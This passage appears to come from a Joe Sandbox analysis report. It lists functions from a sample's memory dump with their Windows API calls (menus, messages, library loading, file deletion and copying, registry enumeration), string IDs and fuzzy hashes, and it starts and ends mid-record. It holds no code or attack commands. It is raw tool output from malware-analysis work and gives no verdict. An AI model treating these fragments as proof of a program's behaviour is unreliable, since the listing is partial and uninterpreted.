                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                                                        • Opcode ID: 1eefa618a84e095b14d361068dc1f5f7a74e8dc91b7a1b073baa86f2b5e2ffa4
                                                                                                                                                                        • Instruction ID: 2731da5096f8f7d7296ce782356ec2ea3b256220ed9786c6ca2a2ad85e0e73cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 1eefa618a84e095b14d361068dc1f5f7a74e8dc91b7a1b073baa86f2b5e2ffa4
                                                                                                                                                                        • Instruction Fuzzy Hash: D041AEB1614206EFDB15CF64D884FAA7BB9EF44310F1081AEA90A9F205D7B0DE54CFA0
                                                                                                                                                                        Function 002F4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F48D1
                                                                                                                                                                        • IsMenu.USER32(?), ref: 002F48E6
                                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002F492E
                                                                                                                                                                        • DrawMenuBar.USER32 ref: 002F4941
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 3076010158-4108050209
                                                                                                                                                                        • Opcode ID: 3295c34f2a6b9640d2d1ac392d12565b4a8ec071f1900b2844fa53098ed99017
                                                                                                                                                                        • Instruction ID: dd6f3154b00ca70178b6a0679757d4e7e83c0ab51bf6da23ccbfe14fac151a4f
                                                                                                                                                                        • Opcode Fuzzy Hash: 3295c34f2a6b9640d2d1ac392d12565b4a8ec071f1900b2844fa53098ed99017
                                                                                                                                                                        • Instruction Fuzzy Hash: 90416C75A1020EEFDB10DF51D884AABBBB9FF053A4F448129EA4597260D7B0AD64CF60
                                                                                                                                                                        Function 002C272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002C27B3
                                                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002C27C6
                                                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 002C27F6
                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                        • API String ID: 2081771294-1403004172
                                                                                                                                                                        • Opcode ID: 82a98392decbe20aef5774da1297fd652b0b8af490d3d742c96d59f2e8ce7467
                                                                                                                                                                        • Instruction ID: ad4dd3d650feb2ef4dd15629b9855a62528906e706fb82ec8d48b6742921d798
                                                                                                                                                                        • Opcode Fuzzy Hash: 82a98392decbe20aef5774da1297fd652b0b8af490d3d742c96d59f2e8ce7467
                                                                                                                                                                        • Instruction Fuzzy Hash: 80210171A10104BADB05ABA0DC8AEFEB778DF453A0B00432DF422A71E1CF34496A9A60
                                                                                                                                                                        Function 002F39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002F3A29
                                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 002F3A30
                                                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002F3A45
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 002F3A4D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                                                        • API String ID: 3529120543-1011021900
                                                                                                                                                                        • Opcode ID: 517e4de6a84929b159bb335cdb902407ebe17a519651eae0044f2e289ea5a603
                                                                                                                                                                        • Instruction ID: f3c0c9cfd5631dc11101f2920485145af886bcb762b0da89452c89c4dccbcf3b
                                                                                                                                                                        • Opcode Fuzzy Hash: 517e4de6a84929b159bb335cdb902407ebe17a519651eae0044f2e289ea5a603
                                                                                                                                                                        • Instruction Fuzzy Hash: 7321D47252020AABEB10CF65EC84FBBB7ADEB443A4F105234FB9196190C3B1CD609760
                                                                                                                                                                        Function 002F9A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 002F9A5D
                                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002F9A72
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 002F9ABA
                                                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 002F9AF0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 2864067406-113007392
                                                                                                                                                                        • Opcode ID: c49302eeb43645b89de28f6beab47fe095be491e77bb6986f12dc682821eba3f
                                                                                                                                                                        • Instruction ID: 4170459aa2dca9bb3bf8b76f37d0d295d5062d727ace210e45eb560ccb83f897
                                                                                                                                                                        • Opcode Fuzzy Hash: c49302eeb43645b89de28f6beab47fe095be491e77bb6986f12dc682821eba3f
                                                                                                                                                                        • Instruction Fuzzy Hash: A121B13551001CEFCF258F58D898FFEBBB9EB093A0F504065FA068B161D73199A1DB50
                                                                                                                                                                        Function 00261AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00261AF4
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 002A31F9
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 002A3203
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 002A320E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 4127811313-113007392
                                                                                                                                                                        • Opcode ID: 4896569d28ffdd77ebc56046f5b6ae3e206194637063d4cd07efb194d0ea72e8
                                                                                                                                                                        • Instruction ID: 01f6361e532122693d8d58154d1b5da16c5c33c89ef182b686609b6eecd3fc83
                                                                                                                                                                        • Opcode Fuzzy Hash: 4896569d28ffdd77ebc56046f5b6ae3e206194637063d4cd07efb194d0ea72e8
                                                                                                                                                                        • Instruction Fuzzy Hash: 07113A31A1101AEFCB10DFA4D98A9FE77B9EB05394F100462F912E6150CB71BAA1DBA1
                                                                                                                                                                        Function 002850DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0028508E,?,?,0028502E,?,003298D8,0000000C,00285185,?,00000002), ref: 002850FD
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00285110
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0028508E,?,?,0028502E,?,003298D8,0000000C,00285185,?,00000002,00000000), ref: 00285133
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                        • Opcode ID: c37c3fc8a62aa90f8a5d9c640426ef4b967fea251454c006afab7deb937742f6
                                                                                                                                                                        • Instruction ID: 5dd576c2f69436bf2a99c82f2bb69c9a1d4efa8b52a51eacc43fc073a7c113d7
                                                                                                                                                                        • Opcode Fuzzy Hash: c37c3fc8a62aa90f8a5d9c640426ef4b967fea251454c006afab7deb937742f6
                                                                                                                                                                        • Instruction Fuzzy Hash: D9F0C834911218BBDB11AF94DC5DBEDBFB6EF04B62F000068F809A21A0CB349D51CB91
                                                                                                                                                                        Function 0026663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026664A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0026665C
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026666E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                                                                        • Opcode ID: 72ad3c5d05d5c48219e765308c6b9e10cbf7a28aa1d475151248c24bc23c8f21
                                                                                                                                                                        • Instruction ID: cf7f66ab2f016dc87b0deccd5e096bfd4d210966ded47dad6217c2139d981b47
                                                                                                                                                                        • Opcode Fuzzy Hash: 72ad3c5d05d5c48219e765308c6b9e10cbf7a28aa1d475151248c24bc23c8f21
                                                                                                                                                                        • Instruction Fuzzy Hash: C6E086356115231793121B25FC1CA7F652D9F82B66F050225F904D2100DB94CC51C4A5
                                                                                                                                                                        Function 00266607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266610
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00266622
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266635
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                                                                        • Opcode ID: 1ef77b61160132471811525f9fa85e5d8b9dda2220c6e2f982cc73c24c0144e2
                                                                                                                                                                        • Instruction ID: 1c22604b89c348a41ce0ecd2b190862457e9c3afff9bbb0f9c7a9df3abc941c4
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ef77b61160132471811525f9fa85e5d8b9dda2220c6e2f982cc73c24c0144e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 5BD012356229335743222B25BC2C9AF6A1A9E92BA13090035F914B2114CF64CD51C5E9
                                                                                                                                                                        Function 002D3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D35C4
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 002D3646
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002D365C
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D366D
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D367F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3226157194-0
                                                                                                                                                                        • Opcode ID: c54e39d957797d7be019c5651a972bdbac34442b9330782fd8bca7c398361f3d
                                                                                                                                                                        • Instruction ID: 948bf08f7add54c3f9204f3dce5b4893c26f7396d72612902a354b5c50e44360
                                                                                                                                                                        • Opcode Fuzzy Hash: c54e39d957797d7be019c5651a972bdbac34442b9330782fd8bca7c398361f3d
                                                                                                                                                                        • Instruction Fuzzy Hash: BDB15E72911119ABDF11EFA4DC85EDEBBBDEF48310F0040A6F509A7241EA749F588FA1
                                                                                                                                                                        Function 002EADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 002EAE87
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002EAE95
                                                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002EAEC8
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002EB09D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3488606520-0
                                                                                                                                                                        • Opcode ID: 2d1ece0edfe74d56283c7c778eeafa7282ad4f422d2d9b7dc63e129dbb641a18
                                                                                                                                                                        • Instruction ID: ccb721fb4f840c2a8d0a4a82f654f70a924268a02ae43f989e8b477eef0bf78b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d1ece0edfe74d56283c7c778eeafa7282ad4f422d2d9b7dc63e129dbb641a18
                                                                                                                                                                        • Instruction Fuzzy Hash: 19A1B071A143019FE721DF28C886B2AB7E5AF44710F54885DF5999B2D2DB71EC90CF82
                                                                                                                                                                        Function 002EC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002ED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002EC10E,?,?), ref: 002ED415
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED451
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4C8
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4FE
                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002EC505
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002EC560
                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002EC5C3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 002EC606
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002EC613
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 826366716-0
                                                                                                                                                                        • Opcode ID: dc047036daa2545ab50043920cbc715168635fdb9cf9d70278e170a76fe1f5d5
                                                                                                                                                                        • Instruction ID: 7b3b0b8f29648aa798926c00a8f1eab9bd3c3075da6a2ec7283207e3a52fad19
                                                                                                                                                                        • Opcode Fuzzy Hash: dc047036daa2545ab50043920cbc715168635fdb9cf9d70278e170a76fe1f5d5
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F61C531128281AFD314DF55C494E2ABBE5FF84308F94855CF0599B292CB31ED56CF91
                                                                                                                                                                        Function 002CED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002CE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002CD7CD,?), ref: 002CE714
                                                                                                                                                                          • Part of subcall function 002CE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002CD7CD,?), ref: 002CE72D
                                                                                                                                                                          • Part of subcall function 002CEAB0: GetFileAttributesW.KERNEL32(?,002CD840), ref: 002CEAB1
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 002CED8A
                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 002CEDC3
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CEF02
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CEF1A
                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 002CEF67
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3183298772-0
                                                                                                                                                                        • Opcode ID: 4feb63f468a75a2a56e486a8a79059cd0b8cd91510d01598a319ad865d726b5a
                                                                                                                                                                        • Instruction ID: 671ce644bdbfc3e88561d0ceacbde69d3ef359d7ed4413bc6d909bae62d8c9a4
                                                                                                                                                                        • Opcode Fuzzy Hash: 4feb63f468a75a2a56e486a8a79059cd0b8cd91510d01598a319ad865d726b5a
